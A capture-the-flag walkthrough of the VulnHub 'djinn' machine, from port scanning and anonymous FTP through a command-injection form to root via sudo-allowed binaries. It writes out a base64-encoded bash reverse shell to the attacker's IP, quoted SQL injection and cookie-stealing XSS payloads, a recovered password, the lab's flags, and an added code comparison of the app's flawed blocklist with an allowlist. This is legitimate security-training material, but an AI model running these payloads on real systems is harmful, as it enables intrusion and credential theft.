INFO
Name : djinn
Entry : 13 / 35
Level: Beginner-Intermediate
VulnHub URL : https://www.vulnhub.com/entry/djinn-1,397/
Description : The machine is VirtualBox as well as VMWare compatible. The DHCP will assign an IP automatically. You'll see the IP right on the login screen. You have to find and read two flags (user and root) which is present in user.txt and root.txt respectively.
GOAL
As with most CTFs from VulnHub, the goal is to get the text file which serves as the flag from the /root directory.
SETUP
I’m using both VMWare Workstation and VirtualBox (depending on the condition of the image) to host Kali and the MisDirection image, with both VMs running in a NAT network (sometimes Bridged). I used VirtualBox this time.
TABLE OF CONTENTS
1. DISCOVERY
2. SCANNING
3. WEB RECONNAISSANCE
4. EXPLOITATION
5. POST EXPLOITATION
6. PRIVILEGE ESCALATION
1. DISCOVERY
: netdiscover
2. SCANNING
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 0 0 11 Oct 20 2019 creds.txt
| -rw-r--r-- 1 0 0 128 Oct 21 2019 game.txt
|_-rw-r--r-- 1 0 0 113 Oct 21 2019 message.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.10.10
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp filtered ssh
┌──(root💀takudaddy)-[~]
└─# nmap -p- 192.168.10.31
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-31 21:58 KST
Nmap scan report for 192.168.10.31
Host is up (0.00014s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp filtered ssh
1337/tcp open waste
7331/tcp open swx
: hidden port 1337 / 7331
2-1. FTP ANONYMOUS LOGIN
┌──(root💀takudaddy)-[~]
└─# ftp 192.168.10.31
Connected to 192.168.10.31.
220 (vsFTPd 3.0.3)
Name (192.168.10.31:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 11 Oct 20 2019 creds.txt
-rw-r--r-- 1 0 0 128 Oct 21 2019 game.txt
-rw-r--r-- 1 0 0 113 Oct 21 2019 message.txt
226 Directory send OK.
ftp> lcd /study
Local directory now /study
ftp> mget *
mget creds.txt?
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for creds.txt (11 bytes).
226 Transfer complete.
11 bytes received in 0.00 secs (11.2838 kB/s)
mget game.txt?
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for game.txt (128 bytes).
226 Transfer complete.
128 bytes received in 0.00 secs (115.2074 kB/s)
mget message.txt?
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for message.txt (113 bytes).
226 Transfer complete.
113 bytes received in 0.00 secs (110.4620 kB/s)
ftp> quit
221 Goodbye.
┌──(root💀takudaddy)-[/study]
└─# cat creds.txt
nitu:81299
┌──(root💀takudaddy)-[/study]
└─# cat game.txt
oh and I forgot to tell you I've setup a game for you on port 1337. See if you can reach to the
final level and get the prize.
┌──(root💀takudaddy)-[/study]
└─# cat message.txt
@nitish81299 I am going on holidays for few days, please take care of all the work.
And don't mess up anything.
3. WEB ENUMERATION
curl
┌──(root💀takudaddy)-[/study]
└─# curl http://192.168.10.31:1337
curl: (1) Received HTTP/0.9 when not allowed
┌──(root💀takudaddy)-[/study]
└─# curl http://192.168.10.31:7331
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<title>Lost in space</title>
<!-- Bootstrap core CSS -->
<!-- <link href="../../dist/css/bootstrap.min.css" rel="stylesheet"> -->
<!-- Custom styles for this template -->
<link href="../static/css/cover.css" rel="stylesheet">
</head>
<body>
<div class="site-wrapper">
<div class="site-wrapper-inner">
<div class="cover-container">
<div class="masthead clearfix">
<div class="inner">
<h3 class="masthead-brand">mzfr</h3>
<nav class="nav nav-masthead">
<a class="nav-link" href="#">Home</a>
<a class="nav-link" href="#">Features</a>
<a class="nav-link" href="#">Contact</a>
</nav>
</div>
</div>
<div class="inner cover">
<h1 class="cover-heading">Let's see how good your are.</h1>
</div>
<div class="mastfoot">
<div class="inner">
<p>Cover template for <a href="https://getbootstrap.com">Bootstrap</a>, by <a href="https://twitter.com/mdo">@mdo</a>.</p>
</div>
</div>
</div>
</div>
</div>
<!-- Bootstrap core JavaScript
================================================== -->
<!-- Placed at the end of the document so the pages load faster -->
<script src="https://code.jquery.com/jquery-3.1.1.slim.min.js" integrity="sha384-A7FZj7v+d/sdmMqp/nOQwliLvUsJfDHW+k9Omg/a/EheAdgtzNs3hpfag6Ed950n" crossorigin="anonymous"></script>
<!-- <script>window.jQuery || document.write('<script src="../../assets/js/vendor/jquery.min.js"><\/script>')</script> -->
<script src="https://cdnjs.cloudflare.com/ajax/libs/tether/1.4.0/js/tether.min.js" integrity="sha384-DztdAPBWPRXSA/3eYEEUWrWCy7G5KFbe8fFjk5JAIxUYHKkDx6Qin1DkWx51bBrb" crossorigin="anonymous"></script>
<!-- <script src="../../dist/js/bootstrap.min.js"></script> -->
<!-- IE10 viewport hack for Surface/desktop Windows 8 bug -->
<!-- <script src="../../assets/js/ie10-viewport-bug-workaround.js"></script> -->
</body>
</html>
:1337
: The numbers and the arithmetic expression change on every refresh.
┌──(root💀takudaddy)-[/study]
└─# nc 192.168.10.31 1337
____ _____ _
/ ___| __ _ _ __ ___ ___ |_ _(_)_ __ ___ ___
| | _ / _` | '_ ` _ \ / _ \ | | | | '_ ` _ \ / _ \
| |_| | (_| | | | | | | __/ | | | | | | | | | __/
\____|\__,_|_| |_| |_|\___| |_| |_|_| |_| |_|\___|
Let's see how good you are with simple maths
Answer my questions 1000 times and I'll give you your gift.
(1, '-', 1)
> 0
(3, '+', 9)
> 12
(6, '+', 6)
> 12
(4, '+', 5)
> 9
(4, '+', 7)
> 11
(9, '/', 4)
> ^C
┌──(root💀takudaddy)-[/study]
└─#
:7331
mzfr
bootstrap?
┌──(root💀takudaddy)-[~]
└─# searchsploit bootstrap
------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------ ---------------------------------
Bootstrapy CMS - Multiple SQL Injection | php/webapps/46590.txt
e107 2 Bootstrap CMS - Cross-Site Scripting | php/webapps/35679.txt
------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
┌──(root💀takudaddy)-[/study]
└─# searchsploit -m php/webapps/46590.txt
Exploit: Bootstrapy CMS - Multiple SQL Injection
URL: https://www.exploit-db.com/exploits/46590
Path: /usr/share/exploitdb/exploits/php/webapps/46590.txt
File Type: UTF-8 Unicode text, with CRLF line terminators
Copied to: /study/46590.txt
┌──(root💀takudaddy)-[/study]
└─# cat 46590.txt
# Exploit Title: Bootstrapy CMS - Multiple SQL Injection
# Date: 21.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: http://bootstrapy.com
# Demo Site: http://bootstrapy.net/demo/
# Version: Lastest
# Tested on: Kali Linux
# CVE: N/A
----- PoC 1: SQLi -----
Request: http://localhost/[PATH]/modules/forums/forum-thread.php
Vulnerable Parameter: thread_id (POST)
Attack Patten:
search=&thread_id=0'XOR(if(now()=sysdate()%2Csleep(5)%2C0))XOR'Z
----- PoC 2: SQLi -----
Request: http://localhost/[PATH]/modules/pages/contact-submit.php
Vulnerable Parameter: subject (POST)
Attack Pattern:
email=sample%40email.tst&message=20&name=wUmrLVWz&subject=0'XOR(if(now()=sysdate()%2Csleep(5)%2C0))XOR'Z&submit=
----- PoC 3 - SQLi -----
Request: http://localhost/[PATH]/modules/forums/post-new-submit.php
Vulnerable Parameter: post-id
Attack Pattern:
body=1&post-id=0'XOR(if(now()=sysdate()%2Csleep(5)%2C0))XOR'Z&quote=1&submit=&thread-id=1
----- PoC 4 - SQLi -----
Request: http://localhost/[PATH]/modules/forums/post-new-submit.php
Vulnerable Parameter: thread-id (POST)
Attack Pattern:
quote=0&reply=1&submit=&thread-id=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z
┌──(root💀takudaddy)-[/study]
└─# searchsploit -m php/webapps/35679.txt
Exploit: e107 2 Bootstrap CMS - Cross-Site Scripting
URL: https://www.exploit-db.com/exploits/35679
Path: /usr/share/exploitdb/exploits/php/webapps/35679.txt
File Type: HTML document, ASCII text, with CRLF line terminators
Copied to: /study/35679.txt
┌──(root💀takudaddy)-[/study]
└─# cat 35679.txt
_____ _____ ______
| _ | | _ ||___ /
| |/' |_ __| |_| | / /
| /| \ \/ /\____ | / /
\ |_/ /> < .___/ /./ /
\___//_/\_\\____/ \_/
by bl4ck s3c
# Exploit Title: e107 v2 Bootstrap CMS XSS Vulnerability
# Date: 03-01-2014
# Google Dork : Proudly powered by e107
# Exploit Author: Ahmet Agar / 0x97
# Version: 2.0.0
# Vendor Homepage: http://e107.org/
# Tested on: OWASP Mantra & Iceweasel
# Vulnerability Description:
CMS user details section is vulnerable to XSS. You can run XSS payloads.
XSS Vulnerability #1:
Go Update user settings page
"http://{target-url}/usersettings.php"
Set Real Name value;
"><script>alert(String.fromCharCode(88, 83, 83))</script>
or
"><script>alert(document.cookie)</script>
========
Credits:
========
Vulnerability found and advisory written by Ahmet Agar.
===========
References:
===========
http://www.0x97.info
htts://twitter.com/_HacKingZ_
:7331 enumeration
# gobuster dir -u http://192.168.10.31:7331 -w /usr/share/wordlists/dirb/big.txt
┌──(root💀takudaddy)-[/study]
└─# gobuster dir -u http://192.168.10.31:7331 -w /usr/share/wordlists/dirb/big.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.10.31:7331
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/03/31 23:11:53 Starting gobuster in directory enumeration mode
===============================================================
/genie (Status: 200) [Size: 1676]
/wish (Status: 200) [Size: 385]
===============================================================
2021/03/31 23:13:51 Finished
===============================================================
Entering a command prints its output both in the URL and on the page:
4. EXPLOITATION
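nc attempt: failed
PHP reverse shell upload: failed
Python reverse shell code execution: failed
Looking closely at the message, though,
it is not an error about missing permissions or anything like that;
it says the choice of characters is wrong.
Try submitting the command encoded in a different way.
URL encoding is applied automatically and that does not get through,
so some other kind of encoding seems to be needed.
I encoded nc -e 192.168.10.10 7979
at https://www.base64encode.org/.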
bmMgLWUgMTkyLjE2OC4xMC4xMCA3OTc5Cg==
Submitted as is: failed!
But base64 does seem to be the right format.
Switch the command to a different form
bash -i >& /dev/tcp/192.168.10.10/7979 0>&1
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwLjEwLzc5NzkgMD4mMQ==
Print it with echo, then pipe it
through base64 to decode it and into bash to execute it.
Start the listener,
then enter the finished command:
echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwLjEwLzc5NzkgMD4mMQ== | base64 -d | bash
echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwLjEwLzc5NzkgMD4mMQ==" | base64 -d | bash
┌──(root💀takudaddy)-[/var/www/html]
└─# nc -lvp 7979
listening on [any] 7979 ...
192.168.10.31: inverse host lookup failed: Unknown host
connect to [192.168.10.10] from (UNKNOWN) [192.168.10.31] 43436
bash: cannot set terminal process group (679): Inappropriate ioctl for device
bash: no job control in this shell
www-data@djinn:/opt/80$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@djinn:/opt/80$
Connection successful!
5. POST EXPLOITATION
www-data@djinn:/opt/80$ ls -al
ls -al
total 24
drwxr-xr-x 4 www-data www-data 4096 Nov 17 2019 .
drwxr-xr-x 4 root root 4096 Nov 14 2019 ..
-rw-r--r-- 1 www-data www-data 1323 Nov 13 2019 app.py
-rw-r--r-- 1 www-data www-data 1846 Nov 14 2019 app.pyc
drwxr-xr-x 5 www-data www-data 4096 Nov 13 2019 static
drwxr-xr-x 2 www-data www-data 4096 Nov 14 2019 templates
www-data@djinn:/opt/80$ cat app.py
cat app.py
import subprocess
from flask import Flask, redirect, render_template, request, url_for
app = Flask(__name__)
app.secret_key = "key"
CREDS = "/home/nitish/.dev/creds.txt"
RCE = ["/", ".", "?", "*", "^", "$", "eval", ";"]
def validate(cmd):
    if CREDS in cmd and "cat" not in cmd:
        return True
    try:
        for i in RCE:
            for j in cmd:
                if i == j:
                    return False
        return True
    except Exception:
        return False
@app.route("/", methods=["GET"])
def index():
    return render_template("main.html")
@app.route("/wish", methods=['POST', "GET"])
def wish():
    execute = request.form.get("cmd")
    if execute:
        if validate(execute):
            output = subprocess.Popen(execute, shell=True,
                                      stdout=subprocess.PIPE).stdout.read()
        else:
            output = "Wrong choice of words"
        return redirect(url_for("genie", name=output))
    else:
        return render_template('wish.html')
@app.route('/genie', methods=['GET', 'POST'])
def genie():
    if 'name' in request.args:
        page = request.args.get('name')
    else:
        page = "It's not that hard"
    return render_template('genie.html', file=page)
if __name__ == "__main__":
    app.run(host='0.0.0.0', debug=True)
www-data@djinn:/opt/80$
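Added example (not part of the original post or of the djinn app): the validate() filter from the app.py listing above, kept with the same logic, next to a hypothetical allowlist replacement, both run over constructed inputs. ALLOWED, validate_strict and run_wish are names assumed for this sketch; the encoded sample decodes to the harmless command id.

```python
import shlex
import subprocess

# Copied from the app.py listing above.
CREDS = "/home/nitish/.dev/creds.txt"
RCE = ["/", ".", "?", "*", "^", "$", "eval", ";"]

def validate(cmd):
    """The original character blocklist, same logic as app.py."""
    if CREDS in cmd and "cat" not in cmd:
        return True
    try:
        for i in RCE:
            for j in cmd:      # j is one character, so "eval" can never match
                if i == j:
                    return False
        return True
    except Exception:
        return False

# Hypothetical allowlist (assumption): program name -> arguments it may take.
ALLOWED = {"id": set(), "uptime": set(), "date": {"-u"}}

def validate_strict(cmd):
    """Return an argv list that can run without a shell, else None."""
    try:
        argv = shlex.split(cmd)
    except ValueError:         # unbalanced quotes
        return None
    if not argv or argv[0] not in ALLOWED:
        return None
    if any(arg not in ALLOWED[argv[0]] for arg in argv[1:]):
        return None
    return argv

def run_wish(cmd):
    """Hardened stand-in for the body of the /wish handler."""
    argv = validate_strict(cmd)
    if argv is None:
        return "Wrong choice of words"
    # shell=False: "|", "&&" and "$()" are never interpreted by a shell.
    done = subprocess.run(argv, shell=False, capture_output=True,
                          text=True, timeout=5)
    return done.stdout

# Constructed inputs; "aWQ=" is base64 for "id".
SAMPLES = [
    "id",
    "date -u",
    "cat /etc/passwd",
    "eval id",
    "echo aWQ= | base64 -d | sh",
]

def compare():
    """(input, passes the original filter, argv accepted by the allowlist)"""
    return [(s, validate(s), validate_strict(s)) for s in SAMPLES]

if __name__ == "__main__":
    for sample, old, new in compare():
        print(f"{sample!r:32} original={old!s:5} allowlist={new}")
```

The original filter passes four of the five inputs, including the encoded pipeline and the "eval" entry it was meant to block; the allowlist accepts only the first two.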
CREDS = "/home/nitish/.dev/creds.txt"
www-data@djinn:/home/nitish/.dev$ cat creds.txt
cat creds.txt
nitish:p4ssw0rdStr3r0n9
www-data@djinn:/home/nitish/.dev$
nitish : p4ssw0rdStr3r0n9
NITISH
Let's switch to nitish
www-data@djinn:/home/nitish/.dev$ su nitish
su nitish
su: must be run from a terminal
It says no.
www-data@djinn:/opt/80$ sudo -l
sudo -l
sudo: no tty present and no askpass program specified
It is the same kind of problem:
a tty or terminal has to be started.
That is easy to fix:
www-data@djinn:/home/nitish/.dev$ bash
bash
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@djinn:/home/nitish/.dev$
www-data@djinn:/home/nitish/.dev$ su nitish
su nitish
Password: p4ssw0rdStr3r0n9
nitish@djinn:~/.dev$ id
id
uid=1001(nitish) gid=1001(nitish) groups=1001(nitish)
nitish@djinn:~/.dev$
Either follow the steps above or connect over ssh.
┌──(root💀takudaddy)-[/attack]
└─# ssh nitish@192.168.10.31
The authenticity of host '192.168.10.31 (192.168.10.31)' can't be established.
ECDSA key fingerprint is SHA256:v2iGR6/ExHheYxy8lYISh+VaSM3sBf3DLY5MGWRpIu4.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.10.31' (ECDSA) to the list of known hosts.
nitish@192.168.10.31's password:
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-66-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Wed Mar 31 20:41:57 IST 2021
System load: 0.0 Processes: 102
Usage of /: 38.9% of 9.78GB Users logged in: 0
Memory usage: 18% IP address for eth0: 192.168.10.31
Swap usage: 0%
* Introducing self-healing high availability clusters in MicroK8s.
Simple, hardened, Kubernetes for production, from RaspberryPi to DC.
https://microk8s.io/high-availability
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
246 packages can be updated.
196 updates are security updates.
Last login: Thu Nov 14 20:32:20 2019 from 192.168.1.107
nitish@djinn:~$ id
uid=1001(nitish) gid=1001(nitish) groups=1001(nitish)
nitish@djinn:~$ ls -al
total 32
drwxr-xr-x 5 nitish nitish 4096 Nov 12 2019 .
drwxr-xr-x 4 root root 4096 Nov 14 2019 ..
-rw------- 1 root root 130 Nov 12 2019 .bash_history
-rw-r--r-- 1 nitish nitish 3771 Nov 11 2019 .bashrc
drwx------ 2 nitish nitish 4096 Nov 11 2019 .cache
drwxr-xr-x 2 nitish nitish 4096 Oct 21 2019 .dev
drwx------ 3 nitish nitish 4096 Nov 11 2019 .gnupg
-rw-r----- 1 nitish nitish 33 Nov 12 2019 user.txt
nitish@djinn:~$ cat user.txt
10aay8289ptgguy1pvfa73alzusyyx3c
nitish@djinn:~$ sudo -l
Matching Defaults entries for nitish on djinn:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User nitish may run the following commands on djinn:
(sam) NOPASSWD: /usr/bin/genie
nitish@djinn:~$
After switching users I got the user flag first,
and it says I can run /usr/bin/genie.
nitish@djinn:/home$ sudo -u sam /usr/bin/genie
usage: genie [-h] [-g] [-p SHELL] [-e EXEC] wish
genie: error: the following arguments are required: wish
nitish@djinn:/home$
It prints the usage.
nitish@djinn:/home$ sudo -u sam /usr/bin/genie -h 192.168.10.10 -g -p /bin/sh -e wish
usage: genie [-h] [-g] [-p SHELL] [-e EXEC] wish
I know you've came to me bearing wishes in mind. So go ahead make your wishes.
positional arguments:
wish Enter your wish
optional arguments:
-h, --help show this help message and exit
-g, --god pass the wish to god
-p SHELL, --shell SHELL
Gives you shell
-e EXEC, --exec EXEC execute command
nitish@djinn:/home$ sudo -u sam /usr/bin/genie -g wish
We've added your wish to our records.
Continue praying!!
nitish@djinn:/home$ sudo -u sam /usr/bin/genie -p /bin/sh wish
Pass your wish to GOD, he might be able to help you.
nitish@djinn:/home$ sudo -u sam /usr/bin/genie -e /bin/bash wish
Pass your wish to GOD, he might be able to help you.
So what am I supposed to do?
The answer is
nitish@djinn:/home$ sudo -u sam /usr/bin/genie -cmd NEW
my man!!
$ exit
You are a noob hacker!!
nitish@djinn:/home$ sudo -u sam /usr/bin/genie -cmd new
my man!!
apparently..
I would never have solved this on my own.
Moving on.
SAM
Moving on.
$ id
uid=1000(sam) gid=1000(sam) groups=1000(sam),4(adm),24(cdrom),30(dip),46(plugdev),108(lxd),113(lpadmin),114(sambashare)
$ bash
sam@djinn:/home$
sam@djinn:/home$ cd sam
sam@djinn:/home/sam$ ls -al
total 36
drwxr-x--- 4 sam sam 4096 Nov 14 2019 .
drwxr-xr-x 4 root root 4096 Nov 14 2019 ..
-rw------- 1 root root 417 Nov 14 2019 .bash_history
-rw-r--r-- 1 root root 220 Oct 20 2019 .bash_logout
-rw-r--r-- 1 sam sam 3771 Oct 20 2019 .bashrc
drwx------ 2 sam sam 4096 Nov 11 2019 .cache
drwx------ 3 sam sam 4096 Oct 20 2019 .gnupg
-rw-r--r-- 1 sam sam 807 Oct 20 2019 .profile
-rw-r--r-- 1 sam sam 1749 Nov 7 2019 .pyc
-rw-r--r-- 1 sam sam 0 Nov 7 2019 .sudo_as_admin_successful
sam@djinn:/home/sam$ sudo -l
Matching Defaults entries for sam on djinn:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User sam may run the following commands on djinn:
(root) NOPASSWD: /root/lago
sam@djinn:/home/sam$ sudo /root/lago
What do you want to do ?
1 - Be naughty
2 - Guess the number
3 - Read some damn files
4 - Work
Enter your choice:1
Working on it!!
sam@djinn:/home/sam$ sudo /root/lago
What do you want to do ?
1 - Be naughty
2 - Guess the number
3 - Read some damn files
4 - Work
Enter your choice:2
Choose a number between 1 to 100:
Enter your number: 77
Better Luck next time
sam@djinn:/home/sam$ sudo /root/lago
What do you want to do ?
1 - Be naughty
2 - Guess the number
3 - Read some damn files
4 - Work
Enter your choice:3
Enter the full of the file to read: .sudo_as_admin_successful
User root is not allowed to read .sudo_as_admin_successful
sam@djinn:/home/sam$ sudo /root/lago
What do you want to do ?
1 - Be naughty
2 - Guess the number
3 - Read some damn files
4 - Work
Enter your choice:4
work your ass off!!
sam@djinn:/home/sam$
What am I supposed to do here?
6. PRIVILEGE ESCALATION
The answer is
sam@djinn:/tmp$ sudo -u root /root/lago
What do you want to do ?
1 - Be naughty
2 - Guess the number
3 - Read some damn files
4 - Work
Enter your choice:2
Choose a number between 1 to 100:
Enter your number: num
# bash
root@djinn:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
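The answer is to pick option 2 and then enter 'num',
which apparently switches you to root.
Seriously.. how is anyone supposed to solve a riddle like this..
Surely this kind of thing doesn't show up on the exam?
(-_- ;)
Anyway, root..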
root@djinn:/root# ls
lago proof.sh
root@djinn:/root# ./proof.sh
_ _ _ _ _
/ \ _ __ ___ __ _ ___(_)_ __ __ _| | | |
/ _ \ | '_ ` _ \ / _` |_ / | '_ \ / _` | | | |
/ ___ \| | | | | | (_| |/ /| | | | | (_| |_|_|_|
/_/ \_\_| |_| |_|\__,_/___|_|_| |_|\__, (_|_|_)
|___/
djinn pwned...
__________________________________________________________________________
Proof: 33eur2wjdmq80z47nyy4fx54bnlg3ibc
Path: /root
Date: Wed Mar 31 21:33:17 IST 2021
Whoami: root
__________________________________________________________________________
By @0xmzfr
Thanks to my fellow teammates in @m0tl3ycr3w for betatesting! :-)
The end